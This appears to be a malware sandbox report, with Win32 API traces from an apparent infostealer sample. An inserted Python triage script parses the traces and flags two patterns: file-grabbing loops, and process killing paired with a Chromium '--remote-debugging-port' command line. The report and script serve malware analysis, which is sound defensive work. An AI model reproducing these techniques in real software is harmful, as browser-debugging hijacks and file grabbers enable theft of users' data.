                            • StrCmpCA.SHLWAPI(?,00FFDE10), ref: 004416B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004416F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004417BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 004417F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044181C
                            • FindClose.KERNEL32(00000000), ref: 0044182B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: b8c8574fb560cabc1709a82818986c3936af60de9d81e733b950c944f6f40a89
                            • Instruction ID: e57ca3da578a361038e048b1e9dd285904c0975652ee5d91da0a6ac70f062cc0
                            • Opcode Fuzzy Hash: b8c8574fb560cabc1709a82818986c3936af60de9d81e733b950c944f6f40a89
                            • Instruction Fuzzy Hash: 0A12A271A103069BEB20EF75D989AAF77B9AF44304F14552EFC46D3260DB78DC418BA8
                            APIs
                            • wsprintfA.USER32 ref: 0044CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044CC13
                            • lstrcat.KERNEL32(?,?), ref: 0044CC5F
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044CC71
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044CC8B
                            • wsprintfA.USER32 ref: 0044CCB0
                            • PathMatchSpecA.SHLWAPI(?,00FF9260), ref: 0044CCE2
                            • CoInitialize.OLE32(00000000), ref: 0044CCEE
                              • Part of subcall function 0044CAE0: CoCreateInstance.COMBASE(0045B110,00000000,00000001,0045B100,?), ref: 0044CB06
                              • Part of subcall function 0044CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0044CB46
                              • Part of subcall function 0044CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0044CBC9
                            • CoUninitialize.COMBASE ref: 0044CD09
                            • lstrcat.KERNEL32(?,?), ref: 0044CD2E
                            • lstrlen.KERNEL32(?), ref: 0044CD3B
                            • StrCmpCA.SHLWAPI(?,0045CFEC), ref: 0044CD55
                            • wsprintfA.USER32 ref: 0044CD7D
                            • wsprintfA.USER32 ref: 0044CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0044CDB0
                            • wsprintfA.USER32 ref: 0044CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0044CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0044CE28
                            • CloseHandle.KERNEL32(00000000), ref: 0044CE33
                            • CloseHandle.KERNEL32(00000000), ref: 0044CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 0044CF8D
                            • FindClose.KERNEL32(?), ref: 0044CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 20937601f604d07906cd34e98432c9abf8a26da99e015a45179ce3033a01b7bc
                            • Instruction ID: 0f5dbbec9757f64cb61fb2eb1d53277a425444978af500c190392ee2d5c60c68
                            • Opcode Fuzzy Hash: 20937601f604d07906cd34e98432c9abf8a26da99e015a45179ce3033a01b7bc
                            • Instruction Fuzzy Hash: 67C18471A002089FDB60DF64DC85AEF777AAF48304F145599F90997290EF78AE44CF64
                            APIs
                            • memset.MSVCRT ref: 00439790
                            • lstrcat.KERNEL32(?,?), ref: 004397A0
                            • lstrcat.KERNEL32(?,?), ref: 004397B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004397C3
                            • memset.MSVCRT ref: 004397D7
                              • Part of subcall function 00453E70: lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00453EA5
                              • Part of subcall function 00453E70: lstrcpy.KERNEL32(00000000,00FFEE68), ref: 00453ECF
                              • Part of subcall function 00453E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0043134E,?,0000001A), ref: 00453ED9
                            • wsprintfA.USER32 ref: 00439806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00439827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00439844
                              • Part of subcall function 004546A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004546B9
                              • Part of subcall function 004546A0: Process32First.KERNEL32(00000000,00000128), ref: 004546C9
                              • Part of subcall function 004546A0: Process32Next.KERNEL32(00000000,00000128), ref: 004546DB
                              • Part of subcall function 004546A0: StrCmpCA.SHLWAPI(?,?), ref: 004546ED
                              • Part of subcall function 004546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
                              • Part of subcall function 004546A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00454711
                              • Part of subcall function 004546A0: CloseHandle.KERNEL32(00000000), ref: 00454718
                              • Part of subcall function 004546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00454726
                              • Part of subcall function 004546A0: CloseHandle.KERNEL32(00000000), ref: 00454731
                            • memset.MSVCRT ref: 00439862
                            • lstrcat.KERNEL32(00000000,?), ref: 00439878
                            • lstrcat.KERNEL32(00000000,?), ref: 00439889
                            • lstrcat.KERNEL32(00000000,00464B60), ref: 0043989B
                            • memset.MSVCRT ref: 004398AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004398D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00439903
                            • StrStrA.SHLWAPI(00000000,00FFF298), ref: 00439919
                            • lstrcpyn.KERNEL32(006693D0,00000000,00000000), ref: 00439938
                            • lstrlen.KERNEL32(?), ref: 0043994B
                            • wsprintfA.USER32 ref: 0043995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00439971
                            • memset.MSVCRT ref: 00439986
                            • Sleep.KERNEL32(00001388), ref: 004399E7
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004392E1
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004392FA
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 00439399
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004393E6
                              • Part of subcall function 00454740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00454759
                              • Part of subcall function 00454740: Process32First.KERNEL32(00000000,00000128), ref: 00454769
                              • Part of subcall function 00454740: Process32Next.KERNEL32(00000000,00000128), ref: 0045477B
                              • Part of subcall function 00454740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0045479C
                              • Part of subcall function 00454740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004547AB
                              • Part of subcall function 00454740: CloseHandle.KERNEL32(00000000), ref: 004547B2
                              • Part of subcall function 00454740: Process32Next.KERNEL32(00000000,00000128), ref: 004547C0
                              • Part of subcall function 00454740: CloseHandle.KERNEL32(00000000), ref: 004547CB
                            • CloseDesktop.USER32(?), ref: 00439A1C
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 2040986984-1862457068
                            • Opcode ID: ef6d38daf4388e6c4deaa66acd07cfa996c676f3789a4ad843e087ab885ee697
                            • Instruction ID: 161b761cb94da918f5d4f48737b1ef0fef8a421c35a3005559729cbcd90011ad
                            • Opcode Fuzzy Hash: ef6d38daf4388e6c4deaa66acd07cfa996c676f3789a4ad843e087ab885ee697
                            • Instruction Fuzzy Hash: D8915271A10208AFDB10EFB4DC45FDE77B9AF48704F105199FA09A7291DAB4AE448BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00441291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004412BF
                            • lstrlen.KERNEL32(00464CA8), ref: 004412CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412E7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 004412F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0044133A
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044135C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441376
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004413AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004413D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004413E2
                            • lstrlen.KERNEL32(00461794), ref: 004413ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044140A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441416
                            • lstrlen.KERNEL32(?), ref: 00441423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441443
                            • lstrcat.KERNEL32(00000000,?), ref: 00441451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044147A
                            • StrCmpCA.SHLWAPI(?,00FFDDB0), ref: 004414A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004414E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441535
                            • StrCmpCA.SHLWAPI(?,00FFE390), ref: 00441552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441593
                            • lstrcpy.KERNEL32(00000000,?), ref: 004415BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004415E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004417BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 004417F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044181C
                            • FindClose.KERNEL32(00000000), ref: 0044182B
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 85883c1bb870b8efeba611e1c671b637e8b1df11fbbb8ea4b52a07236eccde75
                            • Instruction ID: 0c2a46e213ebd64b7dda75720029e4187acbb30c8d43377e674d092de60ab557
                            • Opcode Fuzzy Hash: 85883c1bb870b8efeba611e1c671b637e8b1df11fbbb8ea4b52a07236eccde75
                            • Instruction Fuzzy Hash: DAC1B271A103069BEB21EF75DD89AAF77B9AF04304F14112AFC46D3261DB78DC458BA8
                            APIs
                            • wsprintfA.USER32 ref: 0044E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044E243
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044E263
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044E27D
                            • wsprintfA.USER32 ref: 0044E2A2
                            • StrCmpCA.SHLWAPI(?,0045CFEC), ref: 0044E2B4
                            • wsprintfA.USER32 ref: 0044E2D1
                              • Part of subcall function 0044EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0044EE12
                            • wsprintfA.USER32 ref: 0044E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0044E304
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044E335
                            • lstrcat.KERNEL32(?,00461794), ref: 0044E347
                            • lstrcat.KERNEL32(?,?), ref: 0044E358
                            • lstrcat.KERNEL32(?,00461794), ref: 0044E36A
                            • lstrcat.KERNEL32(?,?), ref: 0044E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E422
                            • DeleteFileA.KERNEL32(?), ref: 0044E45C
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044E49B
                            • FindClose.KERNEL32(00000000), ref: 0044E4AA
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: d27efa4881b0d57bb7ab3e765525375d04d72ae600373a868ee7b68a545b70ce
                            • Instruction ID: 132116ef945c939fd989fbf1f28c0f281b3d94464793104e9b5277a174f2dd6a
                            • Opcode Fuzzy Hash: d27efa4881b0d57bb7ab3e765525375d04d72ae600373a868ee7b68a545b70ce
                            • Instruction Fuzzy Hash: 6D81A3719002189FDB20EF75DD49AEF7779BF48304F00599AF90A93251EB78AA44CFA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004316E2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043176C
                            • lstrcat.KERNEL32(00000000), ref: 00431776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 004318F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004318FE
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: d9a4e164484d9125c513cfb89dc36e72480501f29114419579155fc3d632f6fd
                            • Instruction ID: 928878dc458cd70ee094bd41e5be97bc0a5e68702c52933958e9199915fb4f1f
                            • Opcode Fuzzy Hash: d9a4e164484d9125c513cfb89dc36e72480501f29114419579155fc3d632f6fd
                            • Instruction Fuzzy Hash: 15819571A102069FCB21EF65DD85BAF77B9AF08305F14312AF805A7361DB789C01CBA9
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0044DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0044DD4C
                            • wsprintfA.USER32 ref: 0044DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044DD79
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044DD9C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044DDB6
                            • wsprintfA.USER32 ref: 0044DDD4
                            • DeleteFileA.KERNEL32(?), ref: 0044DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044DDED
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                              • Part of subcall function 0044D980: memset.MSVCRT ref: 0044D9A1
                              • Part of subcall function 0044D980: memset.MSVCRT ref: 0044D9B3
                              • Part of subcall function 0044D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044D9DB
                              • Part of subcall function 0044D980: lstrcpy.KERNEL32(00000000,?), ref: 0044DA0E
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00000000), ref: 0044DA1C
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00FFF2E0), ref: 0044DA36
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,?), ref: 0044DA4A
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00FFDE70), ref: 0044DA5E
                              • Part of subcall function 0044D980: lstrcpy.KERNEL32(00000000,?), ref: 0044DA8E
                              • Part of subcall function 0044D980: GetFileAttributesA.KERNEL32(00000000), ref: 0044DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044DE2E
                            • FindClose.KERNEL32(00000000), ref: 0044DE3D
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044DE66
                            • lstrcat.KERNEL32(?,00FFE470), ref: 0044DE7A
                            • lstrlen.KERNEL32(?), ref: 0044DE84
                            • lstrlen.KERNEL32(?), ref: 0044DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DED2
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 7c617e777e750fd44f0d1f02e90dd6f4302af61e157ef358b09c9ceed230975a
                            • Instruction ID: 48799f7cbab4768c8c9e8a23a3d614e7cf6c7aa2719e4f28ed774371e505ef10
                            • Opcode Fuzzy Hash: 7c617e777e750fd44f0d1f02e90dd6f4302af61e157ef358b09c9ceed230975a
                            • Instruction Fuzzy Hash: 63618271A10208AFCB20EF74DD89AEE77B9BF48304F0055A9F945D7251EB78AA44CF64
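The traces above are raw API sequences with hex arguments, so here is a small triage script that turns them into something reviewable. It is an added example written for this page, not code from the report or from Joe Sandbox, and the two rules in it are my own heuristics. It parses the bullet lines of the APIs sections (direct calls and the indented "Part of subcall function" lines), names the Win32 constants that appear as raw hex (CSIDL 0x1C is CSIDL_LOCAL_APPDATA, CSIDL 0x1A is CSIDL_APPDATA, OpenProcess access 0x1 is PROCESS_TERMINATE, Sleep 0x1388 is 5000 ms) and then checks each function's trace for two patterns visible in this section: the function at 0x439790 concatenates a command line containing the Chromium flags `--remote-debugging-port=9229 --profile-directory=`, opens or creates a desktop, and calls a subroutine (0x4546A0) that snapshots the process list and terminates matching processes; the functions at 0x441291, 0x44E22C, 0x44DD45 and 0x44D54D loop on FindFirstFileA/FindNextFileA, and two of them pass entries through PathMatchSpecA and CopyFileA. The sample lines are copied from the traces above. The process launch that would use the command line is not visible in this section, so the first rule reports only what the trace shows.

```python
"""Triage helper for Joe Sandbox-style "APIs" trace lines (added example, not report code).
Parses bullet lines such as
    • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004397C3
    • Part of subcall function 004546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
names the Win32 constants they carry, and runs two heuristics (this example's own).
"""
import re
from collections import Counter

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Standard Win32 values for constants that appear in the trace as raw hex.
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE"}


def parse_call(line):
    """Parse one bullet line into a dict; return None for headings and other text."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Comma-separated; a quoted argument containing a comma would be split too (none here).
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}


def parse_trace(text):
    return [c for c in map(parse_call, text.splitlines()) if c]


def _hex(arg):
    """Integer value of an 8-hex-digit argument; None for '?' or string arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_call(call):
    """Name the well-known constants so the call reads like source code."""
    api, vals = call["api"], [_hex(a) for a in call["args"]]
    notes = []
    if api == "SHGetFolderPathA" and len(vals) > 1 and vals[1] in CSIDL:
        notes.append(CSIDL[vals[1]])
    if api == "OpenProcess" and vals and vals[0] in PROCESS_ACCESS:
        notes.append(PROCESS_ACCESS[vals[0]])
    if api == "Sleep" and vals and vals[0] is not None:
        notes.append(f"{vals[0]} ms")
    return notes


def analyze(calls):
    """Apply the two heuristics to one function's direct + subcall trace."""
    apis = Counter(c["api"] for c in calls)
    argtext = " ".join(a for c in calls for a in c["args"])
    findings = []
    port = re.search(r"--remote-debugging-port=(\d+)", argtext)
    if port and apis["TerminateProcess"] and (apis["CreateDesktopA"] or apis["OpenDesktopA"]):
        findings.append("terminates processes and builds a command line carrying the Chromium "
                        f"flag --remote-debugging-port={port.group(1)} while holding a separate "
                        "desktop (consistent with relaunching a browser for DevTools access)")
    if apis["FindFirstFileA"] and apis["FindNextFileA"] and apis["CopyFileA"]:
        text = "file grabber: walks a directory listing and copies "
        text += "PathMatchSpec-filtered entries" if apis["PathMatchSpecA"] else "entries"
        if apis["DeleteFileA"]:
            text += "; DeleteFileA is called in the same loop"
        findings.append(text)
    return findings


# Sample input: lines copied from the report's traces of the functions at 0x439790
# (subcall lines included) and 0x44E22C, trimmed to the calls the rules inspect.
SAMPLE_BROWSER = """\
• lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004397C3
• OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00439827
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00439844
  • Part of subcall function 004546A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004546B9
  • Part of subcall function 004546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
  • Part of subcall function 004546A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00454711
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004398D4
• Sleep.KERNEL32(00001388), ref: 004399E7
"""
SAMPLE_GRABBER = """\
• FindFirstFileA.KERNEL32(?,?), ref: 0044E243
• StrCmpCA.SHLWAPI(?,004617A0), ref: 0044E263
• StrCmpCA.SHLWAPI(?,004617A4), ref: 0044E27D
• PathMatchSpecA.SHLWAPI(?,?), ref: 0044E304
• CopyFileA.KERNEL32(?,?,00000001), ref: 0044E394
• DeleteFileA.KERNEL32(?), ref: 0044E45C
• FindNextFileA.KERNEL32(00000000,?), ref: 0044E49B
"""

if __name__ == "__main__":
    for name, text in (("0x439790", SAMPLE_BROWSER), ("0x44E22C", SAMPLE_GRABBER)):
        calls = parse_trace(text)
        decoded = [f"{c['api']}: {', '.join(n)}" for c in calls if (n := decode_call(c))]
        print(name, decoded, analyze(calls), sep="\n  ")
```

The pair of StrCmpCA calls against the fixed addresses 004617A0 and 004617A4 directly after every FindFirstFileA in these functions is where a directory walker normally skips the "." and ".." entries; the strings at those addresses are not shown in this section, so the script does not assume them. The `•` bullet and `, ref:` layout in LINE_RE match this report's lines; a trace from another sandbox needs its own pattern.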
                            APIs
                            • wsprintfA.USER32 ref: 0044D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044D564
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044D584
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044D59E
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044D5E3
                            • lstrcat.KERNEL32(?,00FFF938), ref: 0044D5F7
                            • lstrcat.KERNEL32(?,?), ref: 0044D60B
                            • lstrcat.KERNEL32(?,?), ref: 0044D61C
                            • lstrcat.KERNEL32(?,00461794), ref: 0044D62E
                            • lstrcat.KERNEL32(?,?), ref: 0044D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044D737
                            • FindClose.KERNEL32(00000000), ref: 0044D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 7458c44e7313ef8fba94643215d52d385ac3cecdc2c573ba30274e82e61f2a5c
                            • Instruction ID: 849fc465ad62b9194410e13a9b0384873ded80adc2509d645eb7ae382274b45c
                            • Opcode Fuzzy Hash: 7458c44e7313ef8fba94643215d52d385ac3cecdc2c573ba30274e82e61f2a5c
                            • Instruction Fuzzy Hash: C8619671D102199FDF20EF74DC88ADE77B9EF48304F0055AAEA4993250DB78AA44CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,a_~$4l{l$;wOm$Ra?^$VqzK$`zo$ilwv$n`p\$q.:W$yS{V$=>?$VKm
                            • API String ID: 0-3898095992
                            • Opcode ID: 09703aecd71c93ae2c932d3d48af8832f4ac652ae16a1226187217c15a522148
                            • Instruction ID: ff3abcafa29a20672d4ceec44ce9fbbd8c34fe7ad769e5645d7542b11ab6ba3e
                            • Opcode Fuzzy Hash: 09703aecd71c93ae2c932d3d48af8832f4ac652ae16a1226187217c15a522148
